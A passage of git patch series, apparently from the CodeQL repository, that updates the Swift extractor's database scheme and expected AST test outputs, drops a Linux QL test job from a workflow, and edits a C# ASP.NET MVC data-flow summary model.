@is_pattern ref, + int cast_type_repr: @type_repr_or_none ref +); + +#keyset[id] +is_pattern_sub_patterns( //dir=pattern + int id: @is_pattern ref, + int sub_pattern: @pattern_or_none ref +); + +named_patterns( //dir=pattern + unique int id: @named_pattern, + int var_decl: @var_decl_or_none ref +); + +optional_some_patterns( //dir=pattern + unique int id: @optional_some_pattern, + int sub_pattern: @pattern_or_none ref +); + +paren_patterns( //dir=pattern + unique int id: @paren_pattern, + int sub_pattern: @pattern_or_none ref +); + +tuple_patterns( //dir=pattern + unique int id: @tuple_pattern +); + +#keyset[id, index] +tuple_pattern_elements( //dir=pattern + int id: @tuple_pattern ref, + int index: int ref, + int element: @pattern_or_none ref +); + +typed_patterns( //dir=pattern + unique int id: @typed_pattern, + int sub_pattern: @pattern_or_none ref +); + +#keyset[id] +typed_pattern_type_reprs( //dir=pattern + int id: @typed_pattern ref, + int type_repr: @type_repr_or_none ref +); + +case_label_items( //dir=stmt + unique int id: @case_label_item, + int pattern: @pattern_or_none ref +); + +#keyset[id] +case_label_item_guards( //dir=stmt + int id: @case_label_item ref, + int guard: @expr_or_none ref +); + +condition_elements( //dir=stmt + unique int id: @condition_element +); + +#keyset[id] +condition_element_booleans( //dir=stmt + int id: @condition_element ref, + int boolean_: @expr_or_none ref +); + +#keyset[id] +condition_element_patterns( //dir=stmt + int id: @condition_element ref, + int pattern: @pattern_or_none ref +); + +#keyset[id] +condition_element_initializers( //dir=stmt + int id: @condition_element ref, + int initializer: @expr_or_none ref +); + +#keyset[id] +condition_element_availabilities( //dir=stmt + int id: @condition_element ref, + int availability: @availability_info_or_none ref +); + +@stmt = + @brace_stmt +| @break_stmt +| @case_stmt +| @continue_stmt +| @defer_stmt +| @discard_stmt +| @fail_stmt +| @fallthrough_stmt +| @labeled_stmt +| 
@pound_assert_stmt +| @return_stmt +| @then_stmt +| @throw_stmt +| @yield_stmt +; + +stmt_conditions( //dir=stmt + unique int id: @stmt_condition +); + +#keyset[id, index] +stmt_condition_elements( //dir=stmt + int id: @stmt_condition ref, + int index: int ref, + int element: @condition_element_or_none ref +); + +brace_stmts( //dir=stmt + unique int id: @brace_stmt +); + +#keyset[id, index] +brace_stmt_elements( //dir=stmt + int id: @brace_stmt ref, + int index: int ref, + int element: @ast_node_or_none ref +); + +break_stmts( //dir=stmt + unique int id: @break_stmt +); + +#keyset[id] +break_stmt_target_names( //dir=stmt + int id: @break_stmt ref, + string target_name: string ref +); + +#keyset[id] +break_stmt_targets( //dir=stmt + int id: @break_stmt ref, + int target: @stmt_or_none ref +); + +case_stmts( //dir=stmt + unique int id: @case_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +case_stmt_labels( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int label: @case_label_item_or_none ref +); + +#keyset[id, index] +case_stmt_variables( //dir=stmt + int id: @case_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +continue_stmts( //dir=stmt + unique int id: @continue_stmt +); + +#keyset[id] +continue_stmt_target_names( //dir=stmt + int id: @continue_stmt ref, + string target_name: string ref +); + +#keyset[id] +continue_stmt_targets( //dir=stmt + int id: @continue_stmt ref, + int target: @stmt_or_none ref +); + +defer_stmts( //dir=stmt + unique int id: @defer_stmt, + int body: @brace_stmt_or_none ref +); + +discard_stmts( //dir=stmt + unique int id: @discard_stmt, + int sub_expr: @expr_or_none ref +); + +fail_stmts( //dir=stmt + unique int id: @fail_stmt +); + +fallthrough_stmts( //dir=stmt + unique int id: @fallthrough_stmt, + int fallthrough_source: @case_stmt_or_none ref, + int fallthrough_dest: @case_stmt_or_none ref +); + +@labeled_stmt = + @do_catch_stmt +| @do_stmt +| @for_each_stmt +| 
@labeled_conditional_stmt +| @repeat_while_stmt +| @switch_stmt +; + +#keyset[id] +labeled_stmt_labels( //dir=stmt + int id: @labeled_stmt ref, + string label: string ref +); + +pound_assert_stmts( //dir=stmt + unique int id: @pound_assert_stmt, + int condition: @expr_or_none ref, + string message: string ref +); + +return_stmts( //dir=stmt + unique int id: @return_stmt +); + +#keyset[id] +return_stmt_results( //dir=stmt + int id: @return_stmt ref, + int result: @expr_or_none ref +); + +then_stmts( //dir=stmt + unique int id: @then_stmt, + int result: @expr_or_none ref +); + +throw_stmts( //dir=stmt + unique int id: @throw_stmt, + int sub_expr: @expr_or_none ref +); + +yield_stmts( //dir=stmt + unique int id: @yield_stmt +); + +#keyset[id, index] +yield_stmt_results( //dir=stmt + int id: @yield_stmt ref, + int index: int ref, + int result: @expr_or_none ref +); + +do_catch_stmts( //dir=stmt + unique int id: @do_catch_stmt, + int body: @stmt_or_none ref +); + +#keyset[id, index] +do_catch_stmt_catches( //dir=stmt + int id: @do_catch_stmt ref, + int index: int ref, + int catch: @case_stmt_or_none ref +); + +do_stmts( //dir=stmt + unique int id: @do_stmt, + int body: @brace_stmt_or_none ref +); + +for_each_stmts( //dir=stmt + unique int id: @for_each_stmt, + int pattern: @pattern_or_none ref, + int body: @brace_stmt_or_none ref +); + +#keyset[id, index] +for_each_stmt_variables( //dir=stmt + int id: @for_each_stmt ref, + int index: int ref, + int variable: @var_decl_or_none ref +); + +#keyset[id] +for_each_stmt_wheres( //dir=stmt + int id: @for_each_stmt ref, + int where: @expr_or_none ref +); + +#keyset[id] +for_each_stmt_iterator_vars( //dir=stmt + int id: @for_each_stmt ref, + int iteratorVar: @pattern_binding_decl_or_none ref +); + +#keyset[id] +for_each_stmt_next_calls( //dir=stmt + int id: @for_each_stmt ref, + int nextCall: @expr_or_none ref +); + +@labeled_conditional_stmt = + @guard_stmt +| @if_stmt +| @while_stmt +; + +#keyset[id] +labeled_conditional_stmts( 
//dir=stmt + int id: @labeled_conditional_stmt ref, + int condition: @stmt_condition_or_none ref +); + +repeat_while_stmts( //dir=stmt + unique int id: @repeat_while_stmt, + int condition: @expr_or_none ref, + int body: @stmt_or_none ref +); + +switch_stmts( //dir=stmt + unique int id: @switch_stmt, + int expr: @expr_or_none ref +); + +#keyset[id, index] +switch_stmt_cases( //dir=stmt + int id: @switch_stmt ref, + int index: int ref, + int case_: @case_stmt_or_none ref +); + +guard_stmts( //dir=stmt + unique int id: @guard_stmt, + int body: @brace_stmt_or_none ref +); + +if_stmts( //dir=stmt + unique int id: @if_stmt, + int then: @stmt_or_none ref +); + +#keyset[id] +if_stmt_elses( //dir=stmt + int id: @if_stmt ref, + int else: @stmt_or_none ref +); + +while_stmts( //dir=stmt + unique int id: @while_stmt, + int body: @stmt_or_none ref +); + +@type = + @any_function_type +| @any_generic_type +| @any_metatype_type +| @builtin_type +| @dependent_member_type +| @dynamic_self_type +| @error_type +| @existential_type +| @in_out_type +| @l_value_type +| @module_type +| @pack_element_type +| @pack_expansion_type +| @pack_type +| @parameterized_protocol_type +| @protocol_composition_type +| @reference_storage_type +| @substitutable_type +| @sugar_type +| @tuple_type +| @unresolved_type +; + +#keyset[id] +types( //dir=type + int id: @type ref, + string name: string ref, + int canonical_type: @type_or_none ref +); + +type_reprs( //dir=type + unique int id: @type_repr, + int type_: @type_or_none ref +); + +@any_function_type = + @function_type +| @generic_function_type +; + +#keyset[id] +any_function_types( //dir=type + int id: @any_function_type ref, + int result: @type_or_none ref +); + +#keyset[id, index] +any_function_type_param_types( //dir=type + int id: @any_function_type ref, + int index: int ref, + int param_type: @type_or_none ref +); + +#keyset[id] +any_function_type_is_throwing( //dir=type + int id: @any_function_type ref +); + +#keyset[id] 
+any_function_type_is_async( //dir=type + int id: @any_function_type ref +); + +@any_generic_type = + @nominal_or_bound_generic_nominal_type +| @unbound_generic_type +; + +#keyset[id] +any_generic_types( //dir=type + int id: @any_generic_type ref, + int declaration: @generic_type_decl_or_none ref +); + +#keyset[id] +any_generic_type_parents( //dir=type + int id: @any_generic_type ref, + int parent: @type_or_none ref +); + +@any_metatype_type = + @existential_metatype_type +| @metatype_type +; + +@builtin_type = + @any_builtin_integer_type +| @builtin_bridge_object_type +| @builtin_default_actor_storage_type +| @builtin_executor_type +| @builtin_float_type +| @builtin_job_type +| @builtin_native_object_type +| @builtin_raw_pointer_type +| @builtin_raw_unsafe_continuation_type +| @builtin_unsafe_value_buffer_type +| @builtin_vector_type +; + +dependent_member_types( //dir=type + unique int id: @dependent_member_type, + int base_type: @type_or_none ref, + int associated_type_decl: @associated_type_decl_or_none ref +); + +dynamic_self_types( //dir=type + unique int id: @dynamic_self_type, + int static_self_type: @type_or_none ref +); + +error_types( //dir=type + unique int id: @error_type +); + +existential_types( //dir=type + unique int id: @existential_type, + int constraint: @type_or_none ref +); + +in_out_types( //dir=type + unique int id: @in_out_type, + int object_type: @type_or_none ref +); + +l_value_types( //dir=type + unique int id: @l_value_type, + int object_type: @type_or_none ref +); + +module_types( //dir=type + unique int id: @module_type, + int module: @module_decl_or_none ref +); + +pack_element_types( //dir=type + unique int id: @pack_element_type, + int pack_type: @type_or_none ref +); + +pack_expansion_types( //dir=type + unique int id: @pack_expansion_type, + int pattern_type: @type_or_none ref, + int count_type: @type_or_none ref +); + +pack_types( //dir=type + unique int id: @pack_type +); + +#keyset[id, index] +pack_type_elements( //dir=type + 
int id: @pack_type ref, + int index: int ref, + int element: @type_or_none ref +); + +parameterized_protocol_types( //dir=type + unique int id: @parameterized_protocol_type, + int base: @protocol_type_or_none ref +); + +#keyset[id, index] +parameterized_protocol_type_args( //dir=type + int id: @parameterized_protocol_type ref, + int index: int ref, + int arg: @type_or_none ref +); + +protocol_composition_types( //dir=type + unique int id: @protocol_composition_type +); + +#keyset[id, index] +protocol_composition_type_members( //dir=type + int id: @protocol_composition_type ref, + int index: int ref, + int member: @type_or_none ref +); + +@reference_storage_type = + @unmanaged_storage_type +| @unowned_storage_type +| @weak_storage_type +; + +#keyset[id] +reference_storage_types( //dir=type + int id: @reference_storage_type ref, + int referent_type: @type_or_none ref +); + +@substitutable_type = + @archetype_type +| @generic_type_param_type +; + +@sugar_type = + @paren_type +| @syntax_sugar_type +| @type_alias_type +; + +tuple_types( //dir=type + unique int id: @tuple_type +); + +#keyset[id, index] +tuple_type_types( //dir=type + int id: @tuple_type ref, + int index: int ref, + int type_: @type_or_none ref +); + +#keyset[id, index] +tuple_type_names( //dir=type + int id: @tuple_type ref, + int index: int ref, + string name: string ref +); + +unresolved_types( //dir=type + unique int id: @unresolved_type +); + +@any_builtin_integer_type = + @builtin_integer_literal_type +| @builtin_integer_type +; + +@archetype_type = + @local_archetype_type +| @opaque_type_archetype_type +| @pack_archetype_type +| @primary_archetype_type +; + +#keyset[id] +archetype_types( //dir=type + int id: @archetype_type ref, + int interface_type: @type_or_none ref +); + +#keyset[id] +archetype_type_superclasses( //dir=type + int id: @archetype_type ref, + int superclass: @type_or_none ref +); + +#keyset[id, index] +archetype_type_protocols( //dir=type + int id: @archetype_type ref, + int index: 
int ref, + int protocol: @protocol_decl_or_none ref +); + +builtin_bridge_object_types( //dir=type + unique int id: @builtin_bridge_object_type +); + +builtin_default_actor_storage_types( //dir=type + unique int id: @builtin_default_actor_storage_type +); + +builtin_executor_types( //dir=type + unique int id: @builtin_executor_type +); + +builtin_float_types( //dir=type + unique int id: @builtin_float_type +); + +builtin_job_types( //dir=type + unique int id: @builtin_job_type +); + +builtin_native_object_types( //dir=type + unique int id: @builtin_native_object_type +); + +builtin_raw_pointer_types( //dir=type + unique int id: @builtin_raw_pointer_type +); + +builtin_raw_unsafe_continuation_types( //dir=type + unique int id: @builtin_raw_unsafe_continuation_type +); + +builtin_unsafe_value_buffer_types( //dir=type + unique int id: @builtin_unsafe_value_buffer_type +); + +builtin_vector_types( //dir=type + unique int id: @builtin_vector_type +); + +existential_metatype_types( //dir=type + unique int id: @existential_metatype_type +); + +function_types( //dir=type + unique int id: @function_type +); + +generic_function_types( //dir=type + unique int id: @generic_function_type +); + +#keyset[id, index] +generic_function_type_generic_params( //dir=type + int id: @generic_function_type ref, + int index: int ref, + int generic_param: @generic_type_param_type_or_none ref +); + +generic_type_param_types( //dir=type + unique int id: @generic_type_param_type +); + +metatype_types( //dir=type + unique int id: @metatype_type +); + +@nominal_or_bound_generic_nominal_type = + @bound_generic_type +| @nominal_type +; + +paren_types( //dir=type + unique int id: @paren_type, + int type_: @type_or_none ref +); + +@syntax_sugar_type = + @dictionary_type +| @unary_syntax_sugar_type +; + +type_alias_types( //dir=type + unique int id: @type_alias_type, + int decl: @type_alias_decl_or_none ref +); + +unbound_generic_types( //dir=type + unique int id: @unbound_generic_type +); + 
+unmanaged_storage_types( //dir=type + unique int id: @unmanaged_storage_type +); + +unowned_storage_types( //dir=type + unique int id: @unowned_storage_type +); + +weak_storage_types( //dir=type + unique int id: @weak_storage_type +); + +@bound_generic_type = + @bound_generic_class_type +| @bound_generic_enum_type +| @bound_generic_struct_type +; + +#keyset[id, index] +bound_generic_type_arg_types( //dir=type + int id: @bound_generic_type ref, + int index: int ref, + int arg_type: @type_or_none ref +); + +builtin_integer_literal_types( //dir=type + unique int id: @builtin_integer_literal_type +); + +builtin_integer_types( //dir=type + unique int id: @builtin_integer_type +); + +#keyset[id] +builtin_integer_type_widths( //dir=type + int id: @builtin_integer_type ref, + int width: int ref +); + +dictionary_types( //dir=type + unique int id: @dictionary_type, + int key_type: @type_or_none ref, + int value_type: @type_or_none ref +); + +@local_archetype_type = + @element_archetype_type +| @opened_archetype_type +; + +@nominal_type = + @class_type +| @enum_type +| @protocol_type +| @struct_type +; + +opaque_type_archetype_types( //dir=type + unique int id: @opaque_type_archetype_type, + int declaration: @opaque_type_decl_or_none ref +); + +pack_archetype_types( //dir=type + unique int id: @pack_archetype_type +); + +primary_archetype_types( //dir=type + unique int id: @primary_archetype_type +); + +@unary_syntax_sugar_type = + @array_slice_type +| @optional_type +| @variadic_sequence_type +; + +#keyset[id] +unary_syntax_sugar_types( //dir=type + int id: @unary_syntax_sugar_type ref, + int base_type: @type_or_none ref +); + +array_slice_types( //dir=type + unique int id: @array_slice_type +); + +bound_generic_class_types( //dir=type + unique int id: @bound_generic_class_type +); + +bound_generic_enum_types( //dir=type + unique int id: @bound_generic_enum_type +); + +bound_generic_struct_types( //dir=type + unique int id: @bound_generic_struct_type +); + +class_types( 
//dir=type + unique int id: @class_type +); + +element_archetype_types( //dir=type + unique int id: @element_archetype_type +); + +enum_types( //dir=type + unique int id: @enum_type +); + +opened_archetype_types( //dir=type + unique int id: @opened_archetype_type +); + +optional_types( //dir=type + unique int id: @optional_type +); + +protocol_types( //dir=type + unique int id: @protocol_type +); + +struct_types( //dir=type + unique int id: @struct_type +); + +variadic_sequence_types( //dir=type + unique int id: @variadic_sequence_type +); + +@accessor_or_none = + @accessor +| @unspecified_element +; + +@argument_or_none = + @argument +| @unspecified_element +; + +@associated_type_decl_or_none = + @associated_type_decl +| @unspecified_element +; + +@ast_node_or_none = + @ast_node +| @unspecified_element +; + +@availability_info_or_none = + @availability_info +| @unspecified_element +; + +@availability_spec_or_none = + @availability_spec +| @unspecified_element +; + +@brace_stmt_or_none = + @brace_stmt +| @unspecified_element +; + +@captured_decl_or_none = + @captured_decl +| @unspecified_element +; + +@case_label_item_or_none = + @case_label_item +| @unspecified_element +; + +@case_stmt_or_none = + @case_stmt +| @unspecified_element +; + +@closure_expr_or_none = + @closure_expr +| @unspecified_element +; + +@condition_element_or_none = + @condition_element +| @unspecified_element +; + +@decl_or_none = + @decl +| @unspecified_element +; + +@enum_element_decl_or_none = + @enum_element_decl +| @unspecified_element +; + +@expr_or_none = + @expr +| @unspecified_element +; + +@file_or_none = + @file +| @unspecified_element +; + +@function_or_none = + @function +| @unspecified_element +; + +@generic_type_decl_or_none = + @generic_type_decl +| @unspecified_element +; + +@generic_type_param_decl_or_none = + @generic_type_param_decl +| @unspecified_element +; + +@generic_type_param_type_or_none = + @generic_type_param_type +| @unspecified_element +; + +@initializer_or_none = 
+ @initializer +| @unspecified_element +; + +@key_path_component_or_none = + @key_path_component +| @unspecified_element +; + +@location_or_none = + @location +| @unspecified_element +; + +@macro_role_or_none = + @macro_role +| @unspecified_element +; + +@module_decl_or_none = + @module_decl +| @unspecified_element +; + +@nominal_type_decl_or_none = + @nominal_type_decl +| @unspecified_element +; + +@opaque_type_decl_or_none = + @opaque_type_decl +| @unspecified_element +; + +@opaque_value_expr_or_none = + @opaque_value_expr +| @unspecified_element +; + +@param_decl_or_none = + @param_decl +| @unspecified_element +; + +@pattern_or_none = + @pattern +| @unspecified_element +; + +@pattern_binding_decl_or_none = + @pattern_binding_decl +| @unspecified_element +; + +@precedence_group_decl_or_none = + @precedence_group_decl +| @unspecified_element +; + +@protocol_decl_or_none = + @protocol_decl +| @unspecified_element +; + +@protocol_type_or_none = + @protocol_type +| @unspecified_element +; + +@stmt_or_none = + @stmt +| @unspecified_element +; + +@stmt_condition_or_none = + @stmt_condition +| @unspecified_element +; + +@string_literal_expr_or_none = + @string_literal_expr +| @unspecified_element +; + +@tap_expr_or_none = + @tap_expr +| @unspecified_element +; + +@type_or_none = + @type +| @unspecified_element +; + +@type_alias_decl_or_none = + @type_alias_decl +| @unspecified_element +; + +@type_expr_or_none = + @type_expr +| @unspecified_element +; + +@type_repr_or_none = + @type_repr +| @unspecified_element +; + +@value_decl_or_none = + @unspecified_element +| @value_decl +; + +@var_decl_or_none = + @unspecified_element +| @var_decl +; diff --git a/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties new file mode 100644 index 00000000000..38e20de39fc --- /dev/null +++ b/swift/ql/lib/upgrades/44c4818a8987b5e1b3cd11e553e41045e1262451/upgrade.properties 
@@ -0,0 +1,2 @@ +description: Add variables to `ForEachStmt` +compatibility: backwards From bed638793c9128faff49b0bbd8b75a870ea58240 Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:36:19 +0100 Subject: [PATCH 0862/1267] Swift: remove linux QL tests check --- .github/workflows/swift.yml | 7 ------- 1 file changed, 7 deletions(-) diff --git a/.github/workflows/swift.yml b/.github/workflows/swift.yml index 1a1498e948a..d40376149f7 100644 --- a/.github/workflows/swift.yml +++ b/.github/workflows/swift.yml @@ -54,13 +54,6 @@ jobs: steps: - uses: actions/checkout@v4 - uses: ./swift/actions/build-and-test - qltests-linux: - if: github.repository_owner == 'github' - needs: build-and-test-linux - runs-on: ubuntu-22.04 - steps: - - uses: actions/checkout@v4 - - uses: ./swift/actions/run-ql-tests qltests-macos: if: ${{ github.repository_owner == 'github' && github.event_name == 'pull_request' }} needs: build-and-test-macos From f81f30cc4dc41116f76c235aa3838a2c86e0ba1c Mon Sep 17 00:00:00 2001 From: Paolo Tranquilli Date: Fri, 6 Dec 2024 12:47:54 +0100 Subject: [PATCH 0863/1267] Swift: accept test changes --- .../ParameterizedProtocolType.expected | 16 +++++++ .../ParameterizedProtocolType_getArg.expected | 16 +++++++ .../test/library-tests/ast/PrintAst.expected | 43 ++++++++++--------- 3 files changed, 54 insertions(+), 21 deletions(-) diff --git a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected index 85c426e9c28..309665f809f 100644 --- a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected +++ b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType.expected 
@@ -1 +1,17 @@ | P | getName: | P | getCanonicalType: | P | getBase: | P | getNumberOfArgs: | 2 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | 
getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | +| RawRepresentable | getName: | RawRepresentable | getCanonicalType: | RawRepresentable | getBase: | RawRepresentable | getNumberOfArgs: | 1 | diff --git a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected index 95799228658..2762281ade2 100644 --- a/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected +++ b/swift/ql/test/extractor-tests/generated/type/ParameterizedProtocolType/ParameterizedProtocolType_getArg.expected @@ -1,2 +1,18 @@ | P | 0 | Int | | P | 1 | String | +| RawRepresentable | 0 | Bool | +| RawRepresentable | 0 | Double | +| RawRepresentable | 0 | Float | +| RawRepresentable | 0 | Int8 | +| RawRepresentable | 0 | Int16 | +| RawRepresentable | 0 | Int32 | +| RawRepresentable | 0 | Int64 | +| RawRepresentable | 0 | Int128 | +| RawRepresentable | 0 | Int | +| RawRepresentable | 0 | String | +| RawRepresentable | 0 | UInt8 | +| RawRepresentable | 0 | UInt16 | +| RawRepresentable | 0 | UInt32 | +| RawRepresentable | 0 | UInt64 | +| RawRepresentable | 0 | UInt128 | +| RawRepresentable | 0 | UInt | diff --git a/swift/ql/test/library-tests/ast/PrintAst.expected b/swift/ql/test/library-tests/ast/PrintAst.expected index 82d866baec9..07713e4c28d 100644 --- a/swift/ql/test/library-tests/ast/PrintAst.expected +++ b/swift/ql/test/library-tests/ast/PrintAst.expected 
@@ -702,6 +702,8 @@ cfg.swift: # 155| getVariable(1): [ConcreteVarDecl] xOptional # 155| Type = Int? # 138| getElement(0): [ForEachStmt] for ... in ... { ... } +# 138| getVariable(0): [ConcreteVarDecl] $generator +# 138| Type = IndexingIterator> # 138| getPattern(): [AnyPattern] _ #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 138| getInit(0): [CallExpr] call to makeIterator() @@ -844,8 +846,6 @@ cfg.swift: # 158| getElse(): [BraceStmt] { ... } # 159| getElement(0): [ReturnStmt] return ... # 159| getResult(): [BooleanLiteralExpr] false -# 138| [ConcreteVarDecl] $generator -# 138| Type = IndexingIterator> # 141| [ConcreteVarDecl] $match # 141| Type = Int # 141| [ConcreteVarDecl] $match @@ -3259,6 +3259,10 @@ cfg.swift: # 525| getExpr(): [ExplicitClosureExpr] { ... } # 525| getBody(): [BraceStmt] { ... } # 526| getElement(0): [ForEachStmt] for ... in ... { ... } +# 526| getVariable(0): [ConcreteVarDecl] i +# 526| Type = Int +# 526| getVariable(1): [ConcreteVarDecl] $i$generator +# 526| Type = IndexingIterator> # 526| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 526| getInit(0): [CallExpr] call to makeIterator() @@ -3294,6 +3298,10 @@ cfg.swift: # 525| getExpr().getFullyConverted(): [FunctionConversionExpr] (@isolated(any) () async -> ()) ... # 523| getPattern(0): [NamedPattern] stream # 533| getElement(1): [ForEachStmt] for ... in ... { ... } +# 533| getVariable(0): [ConcreteVarDecl] i +# 533| Type = Int +# 533| getVariable(1): [ConcreteVarDecl] $i$generator +# 533| Type = AsyncStream.Iterator # 533| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 533| getInit(0): [CallExpr] call to makeAsyncIterator() 
@@ -3302,11 +3310,12 @@ cfg.swift: # 533| getBase().getFullyConverted(): [LoadExpr] (AsyncStream) ... #-----| getMethodRef(): [DeclRefExpr] makeAsyncIterator() # 533| getPattern(0): [NamedPattern] $i$generator -# 533| getNextCall(): [CallExpr] call to next() -# 533| getFunction(): [MethodLookupExpr] .next() +# 533| getNextCall(): [CallExpr] call to next(isolation:) +# 533| getFunction(): [MethodLookupExpr] .next(isolation:) # 533| getBase(): [DeclRefExpr] $i$generator # 533| getBase().getFullyConverted(): [InOutExpr] &... -#-----| getMethodRef(): [DeclRefExpr] next() +#-----| getMethodRef(): [DeclRefExpr] next(isolation:) +# 533| getArgument(0): (no string representation) # 533| getNextCall().getFullyConverted(): [AwaitExpr] await ... # 533| getBody(): [BraceStmt] { ... } # 534| getElement(0): [CallExpr] call to print(_:separator:terminator:) @@ -3321,14 +3330,6 @@ cfg.swift: # 534| getArgument(2): [Argument] terminator: default terminator # 534| getExpr(): [DefaultArgumentExpr] default terminator # 525| [NilLiteralExpr] nil -# 526| [ConcreteVarDecl] i -# 526| Type = Int -# 526| [ConcreteVarDecl] $i$generator -# 526| Type = IndexingIterator> -# 533| [ConcreteVarDecl] i -# 533| Type = Int -# 533| [ConcreteVarDecl] $i$generator -# 533| Type = AsyncStream.Iterator # 538| [NamedFunction] testNilCoalescing(x:) # 538| InterfaceType = (Int?) -> Int # 538| getParam(0): [ParamDecl] x @@ -6936,6 +6937,10 @@ statements.swift: # 9| getVariable(0): [ConcreteVarDecl] i # 9| Type = Int # 2| getElement(0): [ForEachStmt] for ... in ... { ... } +# 2| getVariable(0): [ConcreteVarDecl] i +# 2| Type = Int +# 2| getVariable(1): [ConcreteVarDecl] $i$generator +# 2| Type = IndexingIterator> # 2| getPattern(): [NamedPattern] i #-----| getIteratorVar(): [PatternBindingDecl] var ... = ... # 2| getInit(0): [CallExpr] call to makeIterator() 
@@ -7097,10 +7102,6 @@ statements.swift: # 30| getExpr(): [DefaultArgumentExpr] default separator # 30| getArgument(2): [Argument] terminator: default terminator # 30| getExpr(): [DefaultArgumentExpr] default terminator -# 2| [ConcreteVarDecl] i -# 2| Type = Int -# 2| [ConcreteVarDecl] $i$generator -# 2| Type = IndexingIterator> # 34| [EnumDecl] AnError # 35| getMember(0): [EnumCaseDecl] case ... # 35| getMember(1): [EnumElementDecl] failed @@ -7371,6 +7372,10 @@ statements.swift: # 71| [TopLevelCodeDecl] { ... } # 71| getBody(): [BraceStmt] { ... } # 71| getElement(0): [ForEachStmt] for ... in ... where ... { ... } +# 71| getVariable(0): [ConcreteVarDecl] number +# 71| Type = Int +# 71| getVariable(1): [ConcreteVarDecl] $number$generator +# 71| Type = IndexingIterator<[Int]> # 71| getPattern(): [NamedPattern] number # 71| getWhere(): [BinaryExpr] ... .==(_:_:) ... # 71| getFunction(): [MethodLookupExpr] .==(_:_:) @@ -7401,10 +7406,6 @@ statements.swift: # 71| getBase().getFullyConverted(): [InOutExpr] &... #-----| getMethodRef(): [DeclRefExpr] next() # 71| getBody(): [BraceStmt] { ... } -# 71| [ConcreteVarDecl] number -# 71| Type = Int -# 71| [ConcreteVarDecl] $number$generator -# 71| Type = IndexingIterator<[Int]> # 74| [StructDecl] HasModifyAccessorDecl # 75| getMember(0): [PatternBindingDecl] var ... = ... # 75| getPattern(0): [TypedPattern] ... as ... From 0d616ca7efde349758bee3e5de042eda82dc5e78 Mon Sep 17 00:00:00 2001 From: Mathias Vorreiter Pedersen Date: Fri, 6 Dec 2024 12:23:35 +0000 Subject: [PATCH 0864/1267] C#: Respond to PR comments. --- csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml | 10 ++-------- 1 file changed, 2 insertions(+), 8 deletions(-) diff --git a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml index e980e51810b..4942fd4bc91 100644 --- a/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml +++ b/csharp/ql/lib/ext/Microsoft.AspNetCore.Mvc.model.yml 
@@ -3,11 +3,5 @@ extensions:
 pack: codeql/csharp-all
 extensible: summaryModel
 data:
- - ["Microsoft.AspNetCore.Mvc", "Controller", True, "View", "()", "", "Argument[this].Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "ReturnValue.Property[Microsoft.AspNetCore.Mvc.Controller.ViewData].Element.Property[System.Collections.Generic.KeyValuePair`2.Value]", "value", "manual"]
